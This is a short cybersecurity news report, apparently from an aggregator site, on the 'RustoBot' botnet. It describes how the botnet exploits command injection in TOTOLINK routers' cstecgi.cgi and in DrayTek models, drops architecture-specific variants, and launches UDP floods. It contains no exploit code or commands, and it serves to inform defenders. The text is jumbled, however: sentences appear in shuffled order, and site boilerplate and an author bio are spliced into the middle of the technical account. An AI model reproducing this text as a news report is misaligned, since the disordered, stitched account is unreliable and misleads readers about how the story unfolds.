Dubbed “RustoBot” due to its Rust-based implementation, this malware exploits critical vulnerabilities in TOTOLINK and DrayTek router models to execute remote command injections, potentially affecting technology industries across Japan, Taiwan, Vietnam, and Mexico. The botnet primarily targets TOTOLINK models including N600R, A830R, A3100R, A950RG, A800R, A3000RU, and A810R through vulnerabilities in the cstecgi.cgi file, a CGI script responsible for processing user inputs and administrative commands. This emerging threat highlights the persistent vulnerability of IoT and network devices and the evolving sophistication of botnet malware leveraging modern programming languages like Rust for increased stability and cross-platform compatibility. For TOTOLINK devices, the attack uses a crafted request to the vulnerable cstecgi.cgi endpoint with a malicious command string that downloads and executes the malware. A sophisticated new botnet malware written in the Rust programming language has been discovered targeting vulnerable router devices worldwide. The botnet then awaits instructions to launch various DDoS attacks, including UDP flooding, where it generates massive volumes of UDP packets with 1400-byte payloads to specified target IP addresses and ports, overwhelming victim infrastructure. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. Fortinet researchers identified that after initial compromise, RustoBot deploys multiple architecture-specific variants through four different downloader scripts, targeting arm5, arm6, arm7, mips, and mpsl architectures. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. These scripts contain command injection flaws that allow attackers to achieve remote code execution on compromised devices.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 22 Apr 2025 11:10:12 +0000